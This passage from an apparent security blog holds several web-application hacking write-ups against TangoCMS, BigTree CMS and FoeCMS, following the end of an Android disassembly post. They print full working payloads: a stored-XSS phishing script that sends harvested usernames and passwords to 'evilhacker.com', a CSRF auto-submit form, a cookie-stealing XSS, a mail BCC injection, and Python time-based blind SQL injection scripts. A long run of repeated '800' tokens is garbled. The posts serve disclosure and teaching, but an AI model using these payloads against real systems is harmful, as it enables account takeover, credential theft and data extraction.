        27 (00000070) invoke-virtual      v0, v1, Landroid/widget/TextView;->setTextColor(I)V
        28 (00000076) iget-object         v0, v3, Lph/exploit/crack/challenge1/crackchallenge1/MainActivity;->resultText Landroid/widget/TextView;
        29 (0000007a) invoke-virtual      v0, v2, Landroid/widget/TextView;->setVisibility(I)V
        30 (00000080) goto                -20 [ onClick-BB@0x58 ]

***************************************************************************
########## XREF
####################

In [11]:

Here we can see the actual dalvik disassembly and decompile it ourself if need be.

Conclusion

So we've learnt a bit about Android and how we can begin to analyze the system more.

We have been introduced to the basic layout of Android and Android applications, as well as a few tools that can be used to look a little closer at them.

Hopefully this blog post has done a decent job of introducing the basics of Android and given ideas for further exploration.

Further Reading

Android Hacker's Handbook by Joshua J. Drake, Zach Lanier, Collin Mulliner, Pau Oliva Fora, Stephen A. Ridley, Georg Wicherski

Authenticated Stored XSS in TangoCMS

I decided to take a look at TangoCMS for vulnerabilities even though it has been discontinued.

To my surprise there wasn't a huge amount that I could find, I did, however, find an authenticated stored XSS vulnerability.

This post is the description of that vulnerability and how to exploit it.

The Vulnerability

The actual vulnerability exists in the article functionality.

While by default only the admin user is able to create new articles, it makes sense that other users would be given the permissions to create them.

There is some client side filtering going on that does HTML encoding, so if I create an article with the classic javascript alert payload:

What it actually sends is:

The relevant field contains:

1
%23%21html%0D%0A%3Cp%3E%26lt%3Bscript%26gt%3Balert%28%27xss%27%29%26lt%3B%2Fscript%26gt%3B%3C%2Fp%3E

If you URL decode this it is more clear:

1
2
#!html
<p>&lt;script&gt;alert('xss')&lt;/script&gt;</p>

So its HTML encoded the less than (<) and greater than (>) signs.

Fortunately this is very easy to beat by intecepting the request in burp and inserting our payload then:

Now if we visit the articles page the payload launches:

Exploitation

Even though we've clearly found an XSS vulnerability it is only avaliable to authenticated users who have the ability to create (or edit) articles.

On top of this, the session cookies that are used by the application aren't accessible to script code (they all have the HttpOnly flag set), as you can see when you login:

Because of all of this it isn't immediately obvious why this vulnerability is important at all, and a client could decide to ignore the vulnerability because of this, so I went about creating a decent POC payload that demonstrates the problem with this type of vulnerability.

I decided to create a credential harvesting exploit which hopefully would trick even the more security conscious users (obviously ignoring the ability to use BeEF, I like to show how to do things manually).

The main goal of this exploit is to be as stealthy as possible while stealing the credentials so we only want to attack currently logged in users and also we only want to attack each user once.

The first problem (attacking only logged in users) can be acheived by careful review of the client side source code:

Here you can see a div tag with the id sessionGreating and it contains an a tag whose innerHTML is the actual username (here the username is just user, really imaginative :-).

This obviously only shows to users that are currently logged in.

The fact that we can grab the username out of this helps us with the next part of our exploit.

To attack the user only once we will use localStorage, and by getting the username of the logged in user we can make sure that we still run our main payload for different users that use the same browser.

We can now build the start of our payload:

1
2
3
4
5
6
7
d=document.getElementById('sessionGreeting');
if (d) {
    n=d.getElementsByTagName('a')[0].innerHTML;
    if (!localStorage.getItem(n)) {
        [REST OF PAYLOAD]
    }
}

We could of course redirect any user that isn't logged in to the login screen but that would make it more noisy and I think it would be caught quicker.

At this point we know the user is logged in, we also know the username so we could target specific users if we wish but I will target all logged in users.

We could build the login page manually but it would be boring and hugely unnecessary.

The best way I can think of is by just using the real login page, to do this though we'll first need to log the user out, once logged out we can request the real login page:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
r=new XMLHttpRequest();
r.open("GET","http://tangocms/index.php?url=session/index/logout",true);
r.send();
r.onreadystatechange=function(){
    if(r.readyState==4){
        l=new XMLHttpRequest();
        l.open("GET","http://tangocms/index.php?url=session",true);
        l.send();
        l.onreadystatechange=function(){
            if(l.readyState==4){
                [REST OF PAYLOAD]
            }
        }
    }
}

Now we have the contents of the login page in l.responseText.

Before we write this to the screen we need to first make a couple of changes.

We need to hook the onsubmit event of the login form, that way we can run a function which steals the username and password before submitting the form.

We also need to tell the user why the login page is being displayed, if we just log the user straight out with no explaination, that might raise more suspicion than if an explaination is given.

For the explaination I think I'll go with the Your session has expired, please login again message, but we want this to look as realistic as possible so we want to display it how normal error messages are displayed on the site.

We can check this by failing a login:

Looking at the source code for this:

We can see that the message is put right after the h1 that contains a innerHTML of Login right before the form, which is the only form on the page.

We can also see that its contained within a div tag with the id of eventmsgError and a calls of eventmsg, and then inside a p tag.

With all of this information we should be able to create our custom error message using javascript:

1
2
3
4
5
6
7
d=document;
i=d.createElement('div');
i.id='eventmsgError';
i.className='eventmsg';
i.innerHTML="<p>Your session has expired, please login again</p>";
f=d.forms[0];
d.getElementById('content').children[0].insertBefore(i, f);

Obviously we can't use the normal document element for this but we can transform our responseText into a document object like this:

1
2
p=new DOMParser();
z=p.parseFromString(l.responseText,"text/html");

We need to hook the onsubmit event of the form but first we should replace the innerHTML of the document with our newly created login page:

1
document.documentElement.innerHTML=z.documentElement.innerHTML;

Now we can hook the onsubmit event:

1
2
3
4
5
6
7
8
document.forms[0].onsubmit=function(){
    u=document.getElementById('sessionIdentifier').value;
    pass=document.getElementById('sessionPassword').value;
    x=new XMLHttpRequest();
    x.open("GET","http://evilhacker.com?user="+u+"&pass="+pass,true);
    x.send();
    localStorage.setItem(n, "Done");
}

So after I steal the username and password and send it to my machine, I set the localStorage so that it doesn't run again for that user.

Obviously the URL that the username and password is sent to can be anything.

Lastly I want to implement 1 more thing that will make this attack look even more authentic.

I'm going to use pushState to change the URL that is shown in the address bar as the page is changed to the login page.

This will hopefully fool any user who is perceptive enough to look at the address bar to make sure they are on the login page.

Its worth baring in mind that this is only possible because the target URL is the same as the URL we are attacking from, it is not possible to do this for different domains:

1
2
s={ foo: "bar" };
history.pushState(s, "", "/index.php?url=session");

The state object is irrelavent for our purposes and the second argument to pushState (the title) is actually ignored, but will be sorted by the HTML anyway.

Its worth noting that I tried the exploit as is and it didn't work, here is why it didn't work:

The sessionGreeting div tag that we are using to check if the user is logged in is after the script, and as the script gets run when it is first encountered instead of when the full document is loaded the element doesn't exist yet so it doesn't get past the first if statement.

We can fix this easily using a callback that triggers when the document has finished loading:

1
2
3
4
5
document.onreadystatechange=function(){
    if(document.readyState=="complete"){
        [REST OF PAYLOAD]
    }
}

So now our full javascript payload can be created:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
document.onreadystatechange=function(){
    if(document.readyState=="complete"){

        d=document.getElementById('sessionGreeting');
        if (d) {
            n=d.getElementsByTagName('a')[0].innerHTML;
            if (!localStorage.getItem(n)) {
                r=new XMLHttpRequest();
                r.open("GET","http://tangocms/index.php?url=session/index/logout",true);
                r.send();
                r.onreadystatechange=function(){
                    if(r.readyState==4){
                        l=new XMLHttpRequest();
                        l.open("GET","http://tangocms/index.php?url=session",true);
                        l.send();
                        l.onreadystatechange=function(){
                            if(l.readyState==4){
                                p=new DOMParser();
                                z=p.parseFromString(l.responseText,"text/html");
                                i=z.createElement('div');
                                i.id='eventmsgError';
                                i.className='eventmsg';
                                i.innerHTML="<p>Your session has expired, please login again</p>";
                                f=z.forms[0];
                                z.getElementById('content').children[0].insertBefore(i, f);
                                s={ foo: "bar" };
                                history.pushState(s, "", "/index.php?url=session");
                                document.documentElement.innerHTML=z.documentElement.innerHTML;
                                document.forms[0].onsubmit=function(){
                                    u=document.getElementById('sessionIdentifier').value;
                                    pass=document.getElementById('sessionPassword').value;
                                    x=new XMLHttpRequest();
                                    x.open("GET","http://evilhacker.com?user="+u+"&pass="+pass,true);
                                    x.send();
                                    localStorage.setItem(n, "Done");
                                }
                            }
                        }
                    }
                }
            }
        }
    }
}

I URL encoded all of this using Burp:

Copy the output of the Burp encoder, intercept the request while editing the article again and put the encoded payload inbetween script tags after the article:

At this point I setup a python server listening on another host and in my payload I had put the IP address of this host with the port 8000.

Then I logged out and logged in as the admin user, when I went to view the article, it showed for a second but then displayed this page:

800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800 800

Obviously if this had happened right after login it might look a little suspicious but the user might have just put it down to an application bug, especially as it wouldn't happen again.

After logging in again on this page I saw this on my terminal running the python server:

1
2
3
4
D:\test>python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
win8 - - [20/Mar/2015 14:42:57] "GET /[email protected]&pass=admin HTTP/
1.1" 301 -

Now when viewing the article we see:

Obviously in a real attack we'd upload a less obvious article and probably a very interesting one that a lot of people would want to view.

Conclusion

Obviously the major issue here is the need to already have an account with article add/edit abilities but this could be achieved through phishing, brute forcing or just a malicious user.

But I hope this should demonstrate the need for XSS protection in every area of a web application.

It should also demonstrate a way in which accounts can by hijacked even without the ability to get password hashes and crack them or steal session cookies.

With a little imagination the sky is the limit!

Happy Hacking :-)

CSRF In BigTree CMS

Yesterday I found a cross site request forgery (CSRF) vulnerability in the latest version of BigTree CMS (at the time of writing version 1.4.5).

This is a little explaination of the vulnerability and how to exploit it.

The Vulnerability

The vulnerability is in the account settings request, which is used to change the account name, company and password.

A normal request looks like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
POST /site/index.php/admin/users/profile/update/ HTTP/1.1
Host: bigtree
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bigtree/site/index.php/admin/users/profile/
Cookie: bigtree_admin[email]=admin%40admin.com; bigtree_admin[password]=%24P%24BtBKYRYkkk%2FMEvT%2F.XzNJO8j.6Z1bN%2F; PHPSESSID=iee0n5s0gu9b0ausud7hdqkql4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

name=Developer&password=newpassword&company=

The vulnerability exists in [BigTreeROOT]/core/admin/modules/users/profile/update.php:

1
2
3
4
5
<?
        $admin->updateProfile($_POST);
        $admin->growl("Users","Updated Profile");
        BigTree::redirect(ADMIN_ROOT."dashboard/");
?>

Here is clearly isn't doing any checks to prevent CSRF.

The Exploit

So exploiting this is very simple, you just have to lure someone who is already logged into the application is visit a page containing this code:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
<html>
  <body>
    <form method="post" action="http:/bigtree/site/index.php/admin/users/profile/update/" >
      <input type="hidden" name="name" value="admin" />
      <input type="hidden" name="password" value="newpassword" />
      <input type="hidden" name="company" value="foobar" />
    </form>
    <script>
      document.forms[0].submit()
    </script>
  </body>
</html>

The values here can be changed to anything, it just automatically issues a POST request to http:/bigtree/site/index.php/admin/users/profile/update/ with the following arguments:

name=admin&password=newpassword&company=foobar

Unfortunately it is reasonably intrusive because when loaded the victim will see this:

So the user will immediately know that their profile details might have changed.

The Fix

So I contacted Tim Buckingham (the lead developer for BigTree CMS) about this issue yesterday (on 7th March 2015) and he replied the next day informing me that he'd fixed the issue.

You can see the fix here.

The next full releases of BigTree CMS (4.1.6 and 4.0.10) should be out next week and will incorporate this fix.

Happy Hacking :-)

Update (07/04/2015): BigTree CMS have finally released the next version (4.2) that includes the fix, you can download the latest version from here.

Hacking FoeCMS

Today I decided to look at FoeCMS.

There are many known vulnerabilities for the older version of the application (version 1.6.5) but none that I could find for the current version (on Github).

I plan to develop a full attack against this application while looking for vulnerabilities.

Setting Up The App

I setup the application on Debian/Apache/PHP5/MySQL.

Its pretty easy to setup, just pull the code from github with:

git clone https://github.com/themarioga/FoeCMS.git

Place it in the webroot (or subfolder if you wish), set the permissions:

chown -R www-data:www-data /var/www

Then create the database and database user:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@foecms:~# mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 43
Server version: 5.5.41-0+wheezy1 (Debian)

Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> create database foecms;
Query OK, 1 row affected (0.00 sec)

mysql> grant all on foecms.* to 'foecms'@'localhost' identified by 'foecms';
Query OK, 0 rows affected (0.00 sec)

mysql> flush privileges;
Query OK, 0 rows affected (0.00 sec)

mysql> quit
Bye

Now its just a matter of finishing the installation through the browser, visiting the site we get directed to this:

These are the setting I'm using. Notice how only guests with intitations can register.

There is 1 thing left to do, remove or rename the install directory:

root@foecms:~# mv /var/www/install /var/www/install.old

Now that installation is finished when we visit the webpage we should be presented with this:

Some Vulnerabilities

Now we just need to use the application a bit and see what we can find.

Some SQL Injections

The first thing I done is change the language to English (by clicking the little union jack flag on the top of the page), this sends the following request:

http://foecms/index.php?i=2

Which sets the following cookie:

foecms_lang=2; expires=Mon, 09-Mar-2015 11:05:12 GMT

Here we already have 2 possible attack vectors (the value of the i parameter to index.php and the value of the foecms_lang cookie).

In fact both of these are vulnerable to SQL Injection, you can see this if you send this request:

http://foecms/index.php?i=2%27

Here is the full response:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
HTTP/1.1 200 OK
Date: Sun, 08 Mar 2015 11:12:31 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.36-0+deb7u3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: foecms_lang=2%27; expires=Mon, 09-Mar-2015 11:12:31 GMT
Vary: Accept-Encoding
Content-Length: 182
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<script>history.back();</script>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2''' at line 1

And now if you visit any page, you get the same response body:

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2''' at line 1

To get rid of this error we need to remove the %27 from the cookie, I prefer Cookie Manager+ for this purpose:

And delete the PHPSESSID cookie:

Continuing to play about with the application I come across another page with an SQL injection vulnerability:

And an XSS is also possible:

I won't explain how to exploit these SQL injection vulnerabilities anymore, I've already done that pretty extensively in previous posts.

A Mail Injection Vulnerability

So Let's move on.

Clicking on Contact at the bottom of the site give you this, rather poorly written, page:

After putting in some arbitrary information, I set Burp to intercept the request, capture it and insert the following into the email address field:

%0aBCC:[email protected]

Here I am trying to inject another email address to send the email to:

Note: for the web application to be able to send emails externally (on the setup I have running) you need to enable it by running the following command and chosing Internet Site:

root@foecms:~# dpkg-reconfigure exim4-config

Checking the mailbox at mailinators website, we can see the email has been received:

Unfortunately the subject didn't get sent correctly but with a bit of testing I'm sure this could be refined to a more convincing email, and then this could be used as an email proxy to send out spam/phishing email.

A Logic Flaw

When trying to register, by visiting:

http://foecms/register.php

We get redirected to the following error:

This is because I set registration to invite only during installation.

After some testing I decided to add the cookie foecms_userid:

I did this because of the foecms_lang cookie. I then clicked on the link to the test post, which sent this request:

http://foecms/viewitem.php?i=1

I got an error message saying No items found and then redirected to the homepage again, where I see this:

So it appears that I have been logged in.

We also now have the extra User Control Panel button, which gives us:

It looks like even though we're logged in, we're not logged in as anyone in particular, which means we have limited functionailty.

For instance, we can't change any account details because our session doesn't appear to belong to an account.

Inviting Myself

I did, however, have access to the invitation page:

After sending an invitation we get this:

So it tells us the URL to visit. Here is the email that is received:

This email isn't really helpful but the application has already given us the registration URL.

The problem is when we visit it we get this:

Fixing The App

The problem we face here seems to be a problem in the application itself.

It doesn't seem to be prepending the prefix to the table name.

Obviously this would have been fixed on a production website so I just fixed this manually by editing /var/www/include/functions.php, line 336, and changing it from:

1
$res = mysql_query("SELECT * FROM ".$MYSQL_PREFIX."invitation WHERE inv_session LIKE '".mysql_real_escape_string($inv)."'") or die(mysql_error());

And replacing it with this:

1
$res = mysql_query("SELECT * FROM foe_invitation WHERE inv_session LIKE '".mysql_real_escape_string($inv)."'") or die(mysql_error());

So I'm just hardcoding the prefix into the query, not the best fix but it will work for our purposes.

Now when we visit the registration page we get:

Obviously, if we want to create an account we probably want to give it a less obvious name but we are only testing here.

Here is the welcome email you receive after registration:

The main thing we can get from this is that our email is sent in plain text and its encrypted as MD5.

XSS Via SQL Injection

Actually, after this next vulnerability it might not have been necessary to create an account but the account will come in useful for testing it.

Now that we have an account we can try sending a message to it:

Logging into the new hacker acccount we can see we've received a new message:

But clicking on this message show us this (after some form of redirect):

Looking at the code in Burp we can see why this redirect happened:

But the message was displayed:

Now I did try a number of things to perform an XSS attack but was unable to.

But trying to send another message but with message' in the message box we get the following error:

Clearly we have another SQL injection vulnerability but this time in an INSERT statement.

The error tells us that we are injecting right at the end of the statement, so what we'll do is close off the current row and insert a new row, we'll also need to comment out anything after our injection.

So our injection should look as follows:

message'),([our new record]); --

The problem we've got is we don't know the number of columns or their types used in the statement.

We could use 1 of the other SQL injections to query the information_schema to get that information but we can use a different method.

Because NULL can be typecast to any type in MySQL, we can just keep increasing the number of NULL's until we no longer get an error.

There will likely be at least 4 columns (from, to, title and message), so lets start there by sending:

message'),(null,null,null,null); --

We got another error!

Looking at the request in Burp we can see why:

It seems the browser has stripped the last space from the message, which on other DBMSs it wouldn't be a problem but on MySQL it is, so we will use Burp's Repeater to do this injection:

Now we can edit the request in a lot more detail and sending it is successful:

This means there there are only 4 fields (assumably form, to, title and message).

Obviously, this isn't helpful because we've not filled in any of the fields so the message will not actually go to anyone.

The problem is that we don't know the types of the fields (at least the from and to fields) or the positions of any of them other than the message field.

In this case a bit of trial and error is normally required but luckily the first thing I tried turned out to be fruitful:

Hewre I am just injecting (1,2,3,4) as our new record.

After logging into the hacker account and checking the messages, we have recieved a message from admin with the title 3:

As its showing up as being from admin its likely that the first field is the from field and its using the userid instead of the username.

Also, this means the hacker user likely has a userid of 2.

Clicking on the message, we get:

So it no longer redirects, what that probably means is that because we were sending the message from a nonexistent account the redirect happens but when its sent from a valid userid the redirect doesn't happen.

So now we can test sending an XSS payload:

Viewing this message:

So some sanitization has been done.

We can use MySQL's CHAR and CONCAT functions to avoid using < or >.

We do this by putting the following in the message field:

1
concat('message',char(60),'script',char(62),'alert("xss")',char(60),'/script',char(62))

And viewing this message:

Success!

Now we just have to craft a payload that we can use to steal the admin users session cookies (as the cookies aren't protected with the httponly flag its possible to do this using javascript).

One way of doing that is the following:

1
2
3
4
5
6
p="receiver=hacker%26topic=mycookies%26message="%2bdocument.cookie;
r=new+XMLHttpRequest();
r.open("POST","/ucp/index.php?c=2",true);
r.setRequestHeader("Content-type","application/x-www-form-urlencoded");
r.setRequestHeader("Content-length",p.length);
r.send(p);

Here I'm just sending a message to the account I created with the cookies as the message.

I could have just sent to cookie in a HTTP request to any server on the internet and got the cookie that way but I thought this would be fun :-)

Viewing this with firebug we can see that the request was made:

However, as you can see here (from the response in firebug) the request failed:

This was only because the application doesn't allow sending messages to yourself, when we attack the admin account it will be sending the message to the hacker account.

I think its time to test the attack on the admin:

Notice above that I substituted any instance of & with char(38), this was because the application was converting & for & which broke the attack.

Now logging in as admin (with firebug running so we can see the request):

Now if we check the hacker users messages (obviously from a different browser so we don't expire the admin's session):

Finding RCE

We can now hijack the admin's session, there are a number of ways to do this, all we need to do is add the PHPSESSID cookie to our browser.

This time I'm going to do that by setting Burp as the proxy and intercepting the response from the server to add a Set-Cookie header:

Now if we reload the homepage we are logged into the admin account.

An Unrestricted File Upload Vulnerability

There is now another button on the top of the site Admin's Panel, looking through that a bit give us a good option for a file upload vulnerability:

This seemed to work fine, we just need to figure out where it uploaded to.

Visiting the homepage showed a new section with a broken image (assumably the image that I didn't upload when uploading my backdoor:

Right clicking and copying the link to that broken image gave me the following link:

http://foecms/storecontent/image/test/cmd

Browsing about in this storecontent directory led me to where the actual backdoor had been uploaded:

And now we can run commands on the server:

PWNED!!! :-D

Conclusion

As you can see, there can be a lot of steps involved in attacking a web application, especially if you want to make the most out of the attack.

Yes, I could have used the first SQL injection attack to find the admin account details and crack the password (as in my previous post) but firstly, if the admin accounts password is sufficiently secure and encrypted then it might not be feasible to crack it, and secondly I wanted to demonstrate another of the many ways a web application could be comprimised.

Happy Hacking :-)

Further Reading

I'll advise the exact same further reading as in my previous post because they are all still relevant.

A Web Hack

So the other day I ran across this.

Its a virtualbox VM containing load of web applications vulnerable to SQL injection put together by Pentester Academy.

I've been a member of Pentester Academy from the very start (as well as having done a few of Securitytube's earlier courses), which I highly recommend, but I've never seen this VM.

In fact there are 2 VM's on this account that I've never seen before, I've seen both the arbirary file upload VM and the command injection VM (which I done a post about 1 of the applications here) but both the SQL injection and XSS/CRSF I'd never seen before.

So I decided to give it a go.

I've done a few of the challenges and they have been very fun so far but there is 1 I'd like to share.

With these challenges I'm trying to approach them from a web analysis point of view, so I'm looking for many different vulnerablities and not just to SQL injection.

Also I'm not using any public information about the applications to attack them and I'm doing the attacks from a completely blind approach (with no access to the machine or source code at all).

The Vulnerable App

The application I will be demonstrating is Bigtree-CMS.

Its an old version of the application and I won't be downloading the source and looking at that I will just be pretending that the source code is unavaliable.

So if we download the VM, import it into virtualbox boot it up and visit:

http://[ip]/BigTree-CMS/

We are 302 redirected and see the following:

Most likely something has gone wrong here, its worth noting here that I always setup the web browser that I am using to analyse a website to go through burp suite, so let's look at burp to see what happened:

So as you can see the application is pointing to itself via localhost meaning it is using absolute links and not relative. This is probably because the application was setup using localhost as its name.

We'll have to use burp to rewrite all of the responses:

Now if we reload the page we get:

A Quick Analysis

So we have the application working normally, its time to explore it.

There is only 1 thing we know for certain about this application, and that is that it is vulnerable to an SQL injection.

If you click on the Glossary link in the top right of the homepage, you get redirected to the following url:

http://[ip]/BigTree-CMS/site/index.php/glossary/acid/

This suggests that the site is using REST-style urls, which basically means the values from normal url query paramerters are integrated into the url itself. So, in regards to a search function, instead of this url:

http://[website]/[path]?search=foobar

You would have:

http://[website]/[path]/search/foobar

What this means is parts of the url can se treated as a parameter would be treated.

Also, after putting in the following url:

http://[ip]/BigTree-CMS/site/index.php/admin/

We get redirected to the following page:

I tried looking for SQL injections into the login but it appeared to be reasonably secure.

Also there doesn't appear to be a signup link anywhere and going to:

http://[ip]/BigTree-CMS/site/index.php/admin/signup/

Redirects to the login page, and:

http://[ip]/BigTree-CMS/site/index.php/signup/

404's

An SQL Injection

I'm going to rush through this section because there is a lot of trial and error involved in determining the database and building; and refining the injection attack but I go into that in much more detail in my SQL Injections post.

So my focus turned to the url parameters. I first tried:

http://[ip]/BigTree-CMS/site/index.php/glossary/acid%27/

But got redirected back to:

http://[ip]/BigTree-CMS/site/index.php/glossary/acid/

So I tried the quote next to glossary and this happened:

This is very helpful, it actually tells us the full query we are injecting into:

Unfortunately it doesn't allow us to retrieve arbitrary information to the screen (at least that I could find) or even tell us the number of columns that the original query returns.

Obviously we can figure out the number of columns is 3 using SQL's ORDER BY because the lowest number to fail is:

http://[ip]/BigTree-CMS/site/index.php/glossary%27%20order%20by%204%20--%20/acid/

The easiest method I found of exploiting this was by using a time-based approach, I assume you could use a content-based approach by way of a forced error or ensuring no records were returned (and getting returned a 404) but I'm not on a time constraint so I wasn't too bothered.

So I first wrote a script to give me the database name (or at least a database name) and 1 of its table names:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/usr/bin/env python

import urllib2
import sys
import string
import timeit

max = 0
charset = string.printable

if len(sys.argv) < 2:
    max = 50
else:
    max = int(sys.argv[1])

for i in xrange(max):
    check = False
    for c in charset:
        requesturl = "http://sqli/BigTree-CMS/site/index.php/admin%27%20" \
                 "union%20select%20null,null,case%20when%20ascii%28substr%28" \
                 "%28select%20concat%28table_schema,%27%20:%20%27,table_name" \
                 "%29%20from%20information_schema.tables%20where%20" \
                 "table_schema!=%27information_schema%27%20limit%201%29," \
                 "{0},1%29%29={1}%20then%20sleep(3)" \
                 "%20else%201%20end%20--%20/acid/" \
                 .format(str(i+1), str(ord(c)))
        command = "import urllib2;u=\"{0}\";" \
                          "proxy=urllib2.ProxyHandler({'http': '127.0.0.1:8080'});" \
                          "opener=urllib2.build_opener(proxy);" \
                          "opener.addheaders=[('User-agent', 'Mozilla/5.0 (Windows NT 6.3; WOW64;" \
                          " rv:35.0) Gecko/20100101 Firefox/35.0')," \
                          " ('Accept', 'text/html'), ('Accept-Language', 'en_US,en;q=0.5')]"
              .format(requesturl)
        t = timeit.Timer("opener.open(u)", command)
        if t.timeit(number=1)>3.0:
            check = True
            sys.stdout.write(c)
            break

    if not check:
        break

print ''

Believe it or not, this is how I write scripts, stright url encoded (mostly) and normally have the string on 1 line (I've put it on multiple lines here for readability).

For those of you not as used to url encoding and SQL, here is what I'm injecting:

' union select null,null,case when ascii(substr((select concat(table_schema,' : ',table_name) from information_schema.tables where table_schema!='information_schema' limit 1),[position],1))=[character ascii value] then sleep(3) else 1 end --

Then I'm checking to see if the response took longer than 3 seconds (we could increase this based on how quickly the website normally takes to respond).

I'm sending it through the proxy at 127.0.0.1:8080 (which is burp) so that burp can rewrite the relevant content and headers automatically, even though it shouldn't make a difference I thought it wouldn't hurt.

When run we get this:

1
2
C:\Users\User>python "D:\vms\PentesterAcademy\SQL Injection\BigTree-CMS-database.py"
bigtree : bigtree_404s

So we now have the database name and a table name from it, this is likely not the table we are really interested in though so another script is required to find out the rest of the table names:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/usr/bin/env python

import urllib2
import sys
import string
import timeit

max = 0
charset = string.printable

if len(sys.argv) < 2:
    max = 50000
else:
    max = int(sys.argv[1])

for i in xrange(max):
    check = False
    for c in charset:
        requesturl = "http://sqli/BigTree-CMS/site/index.php/admin%27%20" \
                     "union%20select%20null,null,case%20when%20ascii%28substr%28" \
                     "%28select%20group_concat%28table_name%20separator%20%27%20|" \
                     "%20%27%29%20from%20information_schema.tables%20where%20" \
                     "table_schema=%27bigtree%27%20and%20table_name!=" \
                     "%27bigtree_404s%27%29,{0},1%29%29=" \
                     "{1}%20then%20sleep(3)%20else%201%20end%20--%20/acid/" \
                 .format(str(i+1), str(ord(c)))
        command = "import urllib2;u=\"{0}\";" \
                          "proxy=urllib2.ProxyHandler({'http': '127.0.0.1:8080'});" \
                          "opener=urllib2.build_opener(proxy);" \
                          "opener.addheaders=[('User-agent', 'Mozilla/5.0 (Windows NT 6.3; WOW64;" \
                          " rv:35.0) Gecko/20100101 Firefox/35.0')," \
                          " ('Accept', 'text/html'), ('Accept-Language', 'en_US,en;q=0.5')]"
